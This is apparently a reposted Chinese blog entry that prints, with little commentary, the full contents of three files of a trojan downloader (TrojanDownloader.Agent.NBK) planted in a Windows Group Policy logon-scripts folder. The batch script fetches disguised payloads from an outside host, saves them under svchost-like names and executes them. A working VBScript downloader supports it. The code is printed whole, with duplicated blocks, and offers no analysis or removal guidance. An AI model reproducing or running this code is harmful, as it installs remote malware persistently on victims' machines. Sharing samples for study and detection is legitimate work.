TrojanDownloader.Agent.NBK木马脚本
C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon 目录下的三个文件
donw.vbs
shijian.vbs
sys.bat
sys.bat 内容:
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
donw.vbs 内容:
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,1
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,1
shijian.vbs 内容:
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000
本文转自jasonccier 51CTO博客,原文链接:http://blog.51cto.com/jasonccie/397041,如需转载请自行联系原作者
